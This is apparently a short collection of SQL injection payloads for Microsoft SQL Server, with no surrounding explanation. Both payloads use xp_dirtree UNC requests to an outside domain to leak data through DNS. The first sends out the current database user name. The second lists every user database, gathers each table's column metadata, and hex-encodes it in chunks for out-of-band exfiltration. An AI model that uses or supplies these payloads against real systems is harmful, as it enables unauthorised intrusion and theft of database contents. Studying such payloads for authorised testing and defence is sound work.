-- Show Username
'; DECLARE @s varchar(1024); SET @s = 'master..xp_dirtree ''\\' + user_name() + '.inj.cqure.net\fileX'''; exec(@s)--


-- Metadata
';CREATE TABLE #dbs( dbname sysname, dbsize nvarchar(13) null, owner sysname, dbid smallint, created nvarchar(11), dbdesc nvarchar(600) null, cmptlevel tinyint ); INSERT INTO #dbs EXEC sp_helpdb; CREATE TABLE #metadata( dbname varchar(255), tblname varchar(255), colname varchar(255), typename varchar(255), typelen int) DECLARE @dbname varchar(255) DECLARE _dbs CURSOR LOCAL FORWARD_ONLY READ_ONLY FOR SELECT dbname FROM #dbs WHERE dbname<>'master' AND dbname<>'tempdb' AND dbname<>'msdb' OPEN _dbs FETCH NEXT FROM _dbs INTO @dbname WHILE @@FETCH_STATUS = 0 BEGIN DECLARE @tblname varchar(255) DECLARE @sql varchar(255) SELECT @sql = 'USE ' + @dbname + '; INSERT INTO #metadata SELECT ''' + @dbname + ''', so.name, sc.name, st.name, sc.length FROM sysobjects so, syscolumns sc, systypes st WHERE so.id = sc.id AND sc.xtype = st.xtype AND so.xtype=''U''' EXEC(@sql) FETCH NEXT FROM _dbs INTO @dbname END DECLARE @str varchar(8000) DECLARE @chunk varchar(80) DECLARE @file varchar(300) DECLARE @partno int DECLARE @offset int DECLARE @chunksize int DECLARE @temp varchar(1000) DECLARE @total int DECLARE @chunkid varchar(100) DECLARE @dicesize int  DECLARE _descs CURSOR LOCAL FORWARD_ONLY READ_ONLY FOR SELECT CONVERT(char(15),dbname) + CONVERT(char(20),tblname) + CONVERT(char(20), colname) + CONVERT(char(10), typename) + CONVERT(varchar, typelen)+CHAR(10) FROM #metadata OPEN _descs FETCH NEXT FROM _descs INTO @str  WHILE @@FETCH_STATUS = 0 BEGIN SET @partno = 1 SET @chunksize = 40 SET @offset = 0 SET @dicesize = 20 SET @total = LEN(@str) / @chunksize IF ( @total % @chunksize > 0 ) SET @total = @total + 1  SET @chunkid = CONVERT( varchar, CHECKSUM(current_timestamp) )  WHILE (LEN(@str)>1) BEGIN  SET @chunk = SUBSTRING(@str, 1, @chunksize)  SET @str = SUBSTRING(@str, @chunksize + 1, 8000 )  SET @file = master.dbo.fn_varbintohexstr(CONVERT(varbinary(100), @chunk )) SET @offset = 0 SET @temp = ''  WHILE( 1=1 ) BEGIN SET @temp = @temp + SUBSTRING( @file, @offset + 1, @dicesize )  SET @offset = @offset + @dicesize  IF ( @offset > len(@file) ) BREAK  SET @temp = @temp + '.' END SET @file = 'exec master..xp_dirtree ''\\' + @temp + '-' + @chunkid + '-' + convert(varchar, @partno) + '_' + convert(varchar,@total) + '.inj.cqure.net\x''' EXEC(@file) SET @partno=@partno + 1 END FETCH NEXT FROM _descs INTO @str END DROP TABLE #metadata DROP TABLE #dbs--


